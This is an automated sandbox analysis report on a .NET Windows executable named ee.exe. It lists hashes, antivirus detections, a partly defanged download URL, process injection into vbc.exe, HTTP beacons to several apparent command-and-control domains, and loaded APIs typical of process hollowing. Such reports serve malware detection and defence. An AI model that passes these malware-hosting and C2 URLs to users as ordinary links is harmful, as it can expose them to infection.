File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 842.50 KB (862720 bytes) |
Compile time: | 2018-11-15 13:26:10 |
MD5: | 0166e811c83b7c396bfcc37b8cbf74fe |
SHA1: | 2f85dcd895ebe8f8ae22221af699ff9ac85fd050 |
SHA256: | 91ba59b00928c8f579252b5a9e4e771e1ed01accb7a47430be4e17d49e81ecbc |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 4 | import resource debug relocation |
First submission: | 2018-11-21 03:39:05 |
Last submission: | 2018-11-21 03:39:05 |
Filename detected: |
- ee.exe (1) |
URL file hosting |
---|
hXXp://muluz.es/df/ee.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-11-20 22:37:24 | [41/68] | ![]() |
PE Sections 1 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x8d524 | 579072 | 46ea8cf0b08eb798ab770ff34596f550 | 48168163bdc9eafa8e5e52cd7bad2487bf0486ae |
.rsrc | 0x90000 | 0x29644 | 169984 | cc79506992d36deda438678843b63a51 | fba82dce984b3fcadbba6c3c62ab82999577acd9 |
.reloc | 0xba000 | 0xc | 512 | 6198436c0198458228ddb0f0236b9790 | 47c5c1d6b6da62ff2cce62f19c92a3745a5013f0 |
Meta Info | |
---|---|
No Meta found in this file |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
No URL found |
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven03b_64 | Seven03b_64 | VirtualBox | 2018-11-21 08:48:33 | 2018-11-21 08:53:29 | 296 |
10 Behaviors detected by system signatures
Anomalous binary characteristics
Severity: High
Confidence: High
- anomaly: Actual checksum does not match that reported in PE header
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: ee.exe(2060) -> vbc.exe(2132)
Anomalous .NET characteristics
Severity: Medium
Confidence: Very High
- anomalous_version: Assembly version is set to 0
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.zfk3.net/ca/?pPj0Qjn=GmpirGNGe6T+p+J2bEumNMpdWj2kSzDIwWn9qPG7N0PsrTxQLOGzsBP1/uIDnkTLPkymqIIo&9r=fdfLudThQ
- url: http://www.bitkanji.com/ca/?pPj0Qjn=FiZ+iUpoQgne+bqV6KnaykpPOuf0yMZ4dOkbTUwF/uyUKIrhs+hl2DOE8fto2S4JUl5DomC2&9r=fdfLudThQ
- url: http://www.bitkanji.com/ca/
- url: http://www.crypoz.com/ca/?pPj0Qjn=Ty0EsBQ3fDA4ntQhx7mWPdGweQA6rpczL68ZEje3oFZHho6m4n/7NMDKIbNU8V0wLONC+wX9&9r=fdfLudThQ
- url: http://www.crypoz.com/ca/
- url: http://www.spitcrack.com/ca/?pPj0Qjn=6Jl+PEwfeDhIcC2Al4dSs+0ba36HHE3fxCBX0tSaN8OAgOv0/AOgA6i0WOIfnCPJrau4IShy&9r=fdfLudThQ
- url: http://www.spitcrack.com/ca/
- url: http://www.patzcuarofurniture.com/ca/?pPj0Qjn=0t2srzISsm0KTVRh2cLxvtGOCTZ+QOQiCRo+e90xFQTLorSqHC1jPBT1+e3BjXEhYeZHdlYI&9r=fdfLudThQ
- url: http://www.patzcuarofurniture.com/ca/
- url: http://www.jianzhuxuexiao.com/ca/?pPj0Qjn=NwTBT7KtGKbBVpRgl5ySnwh3oIYgLYKoG035dq+CWi3M7IN3boYPtZDEQ4tNEKVwNjLzFGPH&9r=fdfLudThQ
- url: http://www.jianzhuxuexiao.com/ca/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.zfk3.net/ca/?pPj0Qjn=GmpirGNGe6T+p+J2bEumNMpdWj2kSzDIwWn9qPG7N0PsrTxQLOGzsBP1/uIDnkTLPkymqIIo&9r=fdfLudThQ
- suspicious_request: http://www.bitkanji.com/ca/?pPj0Qjn=FiZ+iUpoQgne+bqV6KnaykpPOuf0yMZ4dOkbTUwF/uyUKIrhs+hl2DOE8fto2S4JUl5DomC2&9r=fdfLudThQ
- suspicious_request: http://www.bitkanji.com/ca/
- suspicious_request: http://www.crypoz.com/ca/?pPj0Qjn=Ty0EsBQ3fDA4ntQhx7mWPdGweQA6rpczL68ZEje3oFZHho6m4n/7NMDKIbNU8V0wLONC+wX9&9r=fdfLudThQ
- suspicious_request: http://www.crypoz.com/ca/
- suspicious_request: http://www.spitcrack.com/ca/?pPj0Qjn=6Jl+PEwfeDhIcC2Al4dSs+0ba36HHE3fxCBX0tSaN8OAgOv0/AOgA6i0WOIfnCPJrau4IShy&9r=fdfLudThQ
- suspicious_request: http://www.spitcrack.com/ca/
- suspicious_request: http://www.patzcuarofurniture.com/ca/?pPj0Qjn=0t2srzISsm0KTVRh2cLxvtGOCTZ+QOQiCRo+e90xFQTLorSqHC1jPBT1+e3BjXEhYeZHdlYI&9r=fdfLudThQ
- suspicious_request: http://www.patzcuarofurniture.com/ca/
- suspicious_request: http://www.jianzhuxuexiao.com/ca/?pPj0Qjn=NwTBT7KtGKbBVpRgl5ySnwh3oIYgLYKoG035dq+CWi3M7IN3boYPtZDEQ4tNEKVwNjLzFGPH&9r=fdfLudThQ
- suspicious_request: http://www.jianzhuxuexiao.com/ca/
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: clr.dll/SetRuntimeInfo
- DynamicLoader: clr.dll/_CorExeMain
- DynamicLoader: MSCOREE.DLL/CreateConfigStream
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: KERNEL32.dll/GetNumaHighestNodeNumber
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/AddSIDToBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/CreateBoundaryDescriptorW
- DynamicLoader: KERNEL32.dll/CreatePrivateNamespaceW
- DynamicLoader: KERNEL32.dll/OpenPrivateNamespaceW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/DeleteBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/WerRegisterRuntimeExceptionModule
- DynamicLoader: KERNEL32.dll/RaiseException
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: mscoreei.dll/
- DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize
- DynamicLoader: ntdll.dll/NtSetSystemInformation
- DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld
- DynamicLoader: KERNEL32.dll/AddDllDirectory
- DynamicLoader: KERNEL32.dll/SortGetHandle
- DynamicLoader: KERNEL32.dll/SortCloseHandle
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: clrjit.dll/sxsJitStartup
- DynamicLoader: clrjit.dll/getJit
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: uxtheme.dll/IsAppThemed
- DynamicLoader: uxtheme.dll/IsAppThemedW
- DynamicLoader: KERNEL32.dll/CreateActCtx
- DynamicLoader: KERNEL32.dll/CreateActCtxA
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: USER32.dll/RegisterWindowMessage
- DynamicLoader: USER32.dll/RegisterWindowMessageW
- DynamicLoader: USER32.dll/GetSystemMetrics
- DynamicLoader: KERNEL32.dll/GetModuleHandle
- DynamicLoader: KERNEL32.dll/GetModuleHandleW
- DynamicLoader: KERNEL32.dll/LoadLibrary
- DynamicLoader: KERNEL32.dll/LoadLibraryW
- DynamicLoader: USER32.dll/AdjustWindowRectEx
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: KERNEL32.dll/GetCurrentThread
- DynamicLoader: KERNEL32.dll/DuplicateHandle
- DynamicLoader: KERNEL32.dll/GetCurrentThreadId
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/WideCharToMultiByte
- DynamicLoader: USER32.dll/DefWindowProcW
- DynamicLoader: GDI32.dll/GetStockObject
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/LocaleNameToLCID
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/LCIDToLocaleName
- DynamicLoader: KERNEL32.dll/GetUserPreferredUILanguages
- DynamicLoader: USER32.dll/RegisterClass
- DynamicLoader: USER32.dll/RegisterClassW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: USER32.dll/CreateWindowEx
- DynamicLoader: USER32.dll/CreateWindowExW
- DynamicLoader: USER32.dll/SetWindowLong
- DynamicLoader: USER32.dll/SetWindowLongW
- DynamicLoader: USER32.dll/GetWindowLong
- DynamicLoader: USER32.dll/GetWindowLongW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: nlssorting.dll/SortGetHandle
- DynamicLoader: nlssorting.dll/SortCloseHandle
- DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueEx
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: USER32.dll/SetWindowLong
- DynamicLoader: USER32.dll/SetWindowLongW
- DynamicLoader: USER32.dll/CallWindowProc
- DynamicLoader: USER32.dll/CallWindowProcW
- DynamicLoader: USER32.dll/GetClientRect
- DynamicLoader: USER32.dll/GetWindowRect
- DynamicLoader: USER32.dll/GetParent
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
- DynamicLoader: USER32.dll/GetWindowTextLength
- DynamicLoader: USER32.dll/GetWindowTextLengthW
- DynamicLoader: USER32.dll/GetSystemMetrics
- DynamicLoader: USER32.dll/GetWindowText
- DynamicLoader: USER32.dll/GetWindowTextW
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: USER32.dll/GetProcessWindowStation
- DynamicLoader: USER32.dll/GetUserObjectInformation
- DynamicLoader: USER32.dll/GetUserObjectInformationA
- DynamicLoader: KERNEL32.dll/SetConsoleCtrlHandler
- DynamicLoader: KERNEL32.dll/SetConsoleCtrlHandlerW
- DynamicLoader: KERNEL32.dll/GetModuleHandle
- DynamicLoader: KERNEL32.dll/GetModuleHandleW
- DynamicLoader: USER32.dll/GetClassInfo
- DynamicLoader: USER32.dll/GetClassInfoW
- DynamicLoader: USER32.dll/RegisterClass
- DynamicLoader: USER32.dll/RegisterClassW
- DynamicLoader: USER32.dll/CreateWindowEx
- DynamicLoader: USER32.dll/CreateWindowExW
- DynamicLoader: USER32.dll/DefWindowProc
- DynamicLoader: USER32.dll/DefWindowProcW
- DynamicLoader: KERNEL32.dll/GetStartupInfo
- DynamicLoader: KERNEL32.dll/GetStartupInfoW
- DynamicLoader: USER32.dll/GetWindowPlacement
- DynamicLoader: USER32.dll/GetSystemMetrics
- DynamicLoader: USER32.dll/GetDC
- DynamicLoader: GDI32.dll/GetDeviceCaps
- DynamicLoader: USER32.dll/ReleaseDC
- DynamicLoader: USER32.dll/CreateIconFromResourceEx
- DynamicLoader: USER32.dll/SendMessage
- DynamicLoader: USER32.dll/SendMessageW
- DynamicLoader: USER32.dll/GetSystemMenu
- DynamicLoader: USER32.dll/EnableMenuItem
- DynamicLoader: USER32.dll/SendMessage
- DynamicLoader: USER32.dll/SendMessageW
- DynamicLoader: USER32.dll/SetWindowPos
- DynamicLoader: USER32.dll/RedrawWindow
- DynamicLoader: USER32.dll/ShowWindow
- DynamicLoader: USER32.dll/SendMessage
- DynamicLoader: USER32.dll/SendMessageW
- DynamicLoader: USER32.dll/GetWindowThreadProcessId
- DynamicLoader: USER32.dll/PostMessage
- DynamicLoader: USER32.dll/PostMessageW
- DynamicLoader: ole32.dll/OleInitialize
- DynamicLoader: ole32.dll/CoRegisterMessageFilter
- DynamicLoader: USER32.dll/PeekMessage
- DynamicLoader: USER32.dll/PeekMessageW
- DynamicLoader: USER32.dll/IsWindowUnicode
- DynamicLoader: USER32.dll/GetMessageW
- DynamicLoader: USER32.dll/TranslateMessage
- DynamicLoader: USER32.dll/DispatchMessageW
- DynamicLoader: USER32.dll/WaitMessage
- DynamicLoader: KERNEL32.dll/ReleaseMutex
- DynamicLoader: KERNEL32.dll/CreateMutex
- DynamicLoader: KERNEL32.dll/CreateMutexW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: shell32.dll/SHGetFolderPath
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: KERNEL32.dll/SetThreadErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: KERNEL32.dll/CompareStringOrdinal
- DynamicLoader: clr.dll/CreateAssemblyNameObject
- DynamicLoader: clr.dll/CreateAssemblyNameObjectW
- DynamicLoader: ole32.dll/CoGetObjectContext
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptGenRandom
- DynamicLoader: ole32.dll/NdrOleInitializeExtension
- DynamicLoader: ole32.dll/CoGetClassObject
- DynamicLoader: ole32.dll/CoGetMarshalSizeMax
- DynamicLoader: ole32.dll/CoMarshalInterface
- DynamicLoader: ole32.dll/CoUnmarshalInterface
- DynamicLoader: ole32.dll/StringFromIID
- DynamicLoader: ole32.dll/CoGetPSClsid
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: ole32.dll/CoReleaseMarshalData
- DynamicLoader: ole32.dll/DcomChannelSetHResult
- DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
- DynamicLoader: clr.dll/CreateAssemblyEnum
- DynamicLoader: clr.dll/CreateAssemblyEnumW
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/ResolveLocaleName
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/LoadLibraryA
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/GetModuleHandleA
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: ntdll.dll/NtQuerySystemInformation
- DynamicLoader: ntdll.dll/NtQuerySystemInformationW
- DynamicLoader: KERNEL32.dll/CreateProcessA
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64GetThreadContext
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64SetThreadContext
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: ntdll.dll/NtUnmapViewOfSection
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: USER32.dll/DestroyIcon
- DynamicLoader: USER32.dll/DestroyWindow
- DynamicLoader: USER32.dll/PostThreadMessage
- DynamicLoader: USER32.dll/PostThreadMessageW
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: USER32.dll/GetMessageA
- DynamicLoader: USER32.dll/EnumThreadWindows
- DynamicLoader: USER32.dll/IsWindowVisible
- DynamicLoader: ole32.dll/OleUninitialize
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: ole32.dll/CoWaitForMultipleHandles
- DynamicLoader: USER32.dll/SetClassLong
- DynamicLoader: USER32.dll/SetClassLongW
- DynamicLoader: USER32.dll/PostMessage
- DynamicLoader: USER32.dll/PostMessageW
- DynamicLoader: USER32.dll/UnregisterClass
- DynamicLoader: USER32.dll/UnregisterClassW
- DynamicLoader: USER32.dll/IsWindow
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: USER32.dll/DefWindowProcW
- DynamicLoader: USER32.dll/SetWindowLong
- DynamicLoader: USER32.dll/SetWindowLongW
- DynamicLoader: USER32.dll/SetClassLong
- DynamicLoader: USER32.dll/SetClassLongW
- DynamicLoader: USER32.dll/DestroyWindow
- DynamicLoader: USER32.dll/DestroyWindowW
- DynamicLoader: USER32.dll/PostMessage
- DynamicLoader: USER32.dll/PostMessageW
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/EventUnregister
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven03b_64 | Seven03b_64 | VirtualBox | 2018-11-21 08:48:33 | 2018-11-21 08:53:29 | 296 |
7 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\ee.exe.config C:\Users\Seven01\AppData\Local\Temp\ee.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\MMqXRfHXSQoT92BX\* C:\Users\Seven01\AppData\Local\Temp\ee.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\GAC\PublisherPolicy.tme 